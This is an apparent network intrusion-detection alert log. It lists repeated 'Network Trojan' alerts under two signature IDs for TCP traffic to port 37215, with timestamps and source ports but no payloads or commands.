                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102148
                  SID:2835222
                  Source Port:34738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879798
                  SID:2829579
                  Source Port:33482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.478787
                  SID:2829579
                  Source Port:59248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222070
                  SID:2829579
                  Source Port:52640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.517899
                  SID:2829579
                  Source Port:39290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.772453
                  SID:2829579
                  Source Port:34042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526473
                  SID:2835222
                  Source Port:60562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569394
                  SID:2829579
                  Source Port:47070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.653833
                  SID:2835222
                  Source Port:49568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.762956
                  SID:2835222
                  Source Port:43352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.220716
                  SID:2829579
                  Source Port:51444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.821657
                  SID:2829579
                  Source Port:53818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155928
                  SID:2835222
                  Source Port:41590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.485382
                  SID:2829579
                  Source Port:58252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681419
                  SID:2835222
                  Source Port:48698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063010
                  SID:2829579
                  Source Port:54498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.965572
                  SID:2835222
                  Source Port:53192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2829579
                  Source Port:37146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853206
                  SID:2829579
                  Source Port:45566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.712804
                  SID:2835222
                  Source Port:58572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.829275
                  SID:2829579
                  Source Port:50944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.126815
                  SID:2835222
                  Source Port:56350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022407
                  SID:2835222
                  Source Port:38044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.046169
                  SID:2829579
                  Source Port:57006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107350
                  SID:2835222
                  Source Port:35098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.263619
                  SID:2835222
                  Source Port:41266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.753461
                  SID:2829579
                  Source Port:46698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.806136
                  SID:2829579
                  Source Port:53726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.429574
                  SID:2835222
                  Source Port:48862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2829579
                  Source Port:48956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.896247
                  SID:2835222
                  Source Port:34446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.621748
                  SID:2829579
                  Source Port:33176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776398
                  SID:2835222
                  Source Port:43314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819807
                  SID:2835222
                  Source Port:50988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395697
                  SID:2829579
                  Source Port:36898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.232329
                  SID:2829579
                  Source Port:57122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.102138
                  SID:2835222
                  Source Port:60164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.184507
                  SID:2835222
                  Source Port:53970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.179861
                  SID:2829579
                  Source Port:38954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.890908
                  SID:2835222
                  Source Port:46720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257380
                  SID:2829579
                  Source Port:41754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2835222
                  Source Port:40240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.165821
                  SID:2835222
                  Source Port:43764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.280858
                  SID:2835222
                  Source Port:47580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.442425
                  SID:2835222
                  Source Port:49912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237564
                  SID:2835222
                  Source Port:41282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.433538
                  SID:2829579
                  Source Port:46870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824053
                  SID:2829579
                  Source Port:37736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.546205
                  SID:2835222
                  Source Port:42442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545496
                  SID:2835222
                  Source Port:41010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.040762
                  SID:2835222
                  Source Port:36510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355278
                  SID:2829579
                  Source Port:44328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.950899
                  SID:2829579
                  Source Port:40748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.556731
                  SID:2829579
                  Source Port:56472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.381447
                  SID:2829579
                  Source Port:42066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.293782
                  SID:2829579
                  Source Port:47264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.245548
                  SID:2835222
                  Source Port:44002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.854453
                  SID:2829579
                  Source Port:51992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.182534
                  SID:2835222
                  Source Port:59582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.528829
                  SID:2835222
                  Source Port:38694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137377
                  SID:2829579
                  Source Port:39142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.407750
                  SID:2835222
                  Source Port:54352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404478
                  SID:2835222
                  Source Port:56308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156196
                  SID:2835222
                  Source Port:51598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.359553
                  SID:2835222
                  Source Port:36254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.412614
                  SID:2835222
                  Source Port:34466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.008729
                  SID:2835222
                  Source Port:35136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.053819
                  SID:2835222
                  Source Port:58412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.210999
                  SID:2835222
                  Source Port:58398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.460068
                  SID:2835222
                  Source Port:58214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420785
                  SID:2829579
                  Source Port:39268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.787511
                  SID:2835222
                  Source Port:44874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298145
                  SID:2835222
                  Source Port:33210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841336
                  SID:2829579
                  Source Port:40234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.654312
                  SID:2835222
                  Source Port:57228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.002542
                  SID:2835222
                  Source Port:58764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.791681
                  SID:2835222
                  Source Port:45886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.501573
                  SID:2835222
                  Source Port:51338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.492673
                  SID:2829579
                  Source Port:36142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128612
                  SID:2829579
                  Source Port:47334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879112
                  SID:2829579
                  Source Port:37760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.436206
                  SID:2835222
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.407360
                  SID:2835222
                  Source Port:38494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.827026
                  SID:2835222
                  Source Port:51468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828645
                  SID:2835222
                  Source Port:50940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.511682
                  SID:2835222
                  Source Port:47844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.291888
                  SID:2829579
                  Source Port:39556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951496
                  SID:2829579
                  Source Port:56720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.407026
                  SID:2835222
                  Source Port:33414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.526840
                  SID:2835222
                  Source Port:42410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200301
                  SID:2829579
                  Source Port:34820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2829579
                  Source Port:60582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583979
                  SID:2829579
                  Source Port:48954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.945203
                  SID:2829579
                  Source Port:46000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849437
                  SID:2829579
                  Source Port:39414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847892
                  SID:2835222
                  Source Port:39122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.732568
                  SID:2829579
                  Source Port:33554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.945203
                  SID:2829579
                  Source Port:44220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339204
                  SID:2829579
                  Source Port:39366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.911929
                  SID:2829579
                  Source Port:53540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.791682
                  SID:2829579
                  Source Port:47770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.935220
                  SID:2829579
                  Source Port:45866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442446
                  SID:2835222
                  Source Port:51778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641903
                  SID:2829579
                  Source Port:47870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.887848
                  SID:2829579
                  Source Port:41476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538711
                  SID:2829579
                  Source Port:46644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.931040
                  SID:2829579
                  Source Port:47236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.821987
                  SID:2835222
                  Source Port:58788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.154328
                  SID:2829579
                  Source Port:49702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667914
                  SID:2829579
                  Source Port:56946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.516080
                  SID:2835222
                  Source Port:46932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.624566
                  SID:2829579
                  Source Port:34452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156684
                  SID:2829579
                  Source Port:35144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.891587
                  SID:2835222
                  Source Port:41350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.971653
                  SID:2829579
                  Source Port:51822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.876796
                  SID:2835222
                  Source Port:34080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.545525
                  SID:2829579
                  Source Port:34840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357123
                  SID:2829579
                  Source Port:50452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.093264
                  SID:2835222
                  Source Port:54490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151266
                  SID:2835222
                  Source Port:38060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.290610
                  SID:2829579
                  Source Port:46396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867032
                  SID:2835222
                  Source Port:56684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000365
                  SID:2829579
                  Source Port:47364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084345
                  SID:2829579
                  Source Port:50872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.595538
                  SID:2835222
                  Source Port:49460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.514998
                  SID:2829579
                  Source Port:58588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.401211
                  SID:2829579
                  Source Port:34442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2835222
                  Source Port:38364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.879483
                  SID:2835222
                  Source Port:50208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932018
                  SID:2829579
                  Source Port:52104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.658202
                  SID:2829579
                  Source Port:52112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.895563
                  SID:2829579
                  Source Port:38976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305980
                  SID:2835222
                  Source Port:41300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.336820
                  SID:2835222
                  Source Port:50662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.516790
                  SID:2829579
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.828457
                  SID:2835222
                  Source Port:47330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.520024
                  SID:2835222
                  Source Port:46942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.869440
                  SID:2835222
                  Source Port:44028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.726260
                  SID:2835222
                  Source Port:53072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381629
                  SID:2829579
                  Source Port:47184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2835222
                  Source Port:51626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.834879
                  SID:2829579
                  Source Port:53902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.773841
                  SID:2835222
                  Source Port:33018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.438982
                  SID:2835222
                  Source Port:50966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.364400
                  SID:2835222
                  Source Port:50730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.538381
                  SID:2829579
                  Source Port:41006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.962106
                  SID:2835222
                  Source Port:39756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.527873
                  SID:2829579
                  Source Port:54514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.130427
                  SID:2829579
                  Source Port:54302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.578531
                  SID:2829579
                  Source Port:54250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558738
                  SID:2829579
                  Source Port:34302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793523
                  SID:2835222
                  Source Port:54742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634002
                  SID:2829579
                  Source Port:37750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.800330
                  SID:2835222
                  Source Port:50850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810529
                  SID:2829579
                  Source Port:36366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.015024
                  SID:2829579
                  Source Port:47210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.938388
                  SID:2835222
                  Source Port:33972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828942
                  SID:2835222
                  Source Port:54856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872780
                  SID:2835222
                  Source Port:49176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.304428
                  SID:2829579
                  Source Port:40972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.560872
                  SID:2835222
                  Source Port:34478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.907935
                  SID:2835222
                  Source Port:55876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.784523
                  SID:2835222
                  Source Port:55586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.667979
                  SID:2829579
                  Source Port:36728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763901
                  SID:2829579
                  Source Port:47832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.599801
                  SID:2829579
                  Source Port:35960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645401
                  SID:2829579
                  Source Port:48146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600154
                  SID:2829579
                  Source Port:43938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.430754
                  SID:2829579
                  Source Port:34386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.867882
                  SID:2835222
                  Source Port:51614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.552864
                  SID:2829579
                  Source Port:38650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.334233
                  SID:2829579
                  Source Port:44904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.139115
                  SID:2835222
                  Source Port:58796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.732567
                  SID:2829579
                  Source Port:48168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.029476
                  SID:2835222
                  Source Port:57756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448133
                  SID:2829579
                  Source Port:46464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.586022
                  SID:2835222
                  Source Port:50304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.497299
                  SID:2829579
                  Source Port:51158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.310052
                  SID:2835222
                  Source Port:34012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939708
                  SID:2835222
                  Source Port:42658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778928
                  SID:2835222
                  Source Port:51780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545820
                  SID:2829579
                  Source Port:43412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.789703
                  SID:2829579
                  Source Port:36690
                  Destination Port:37215
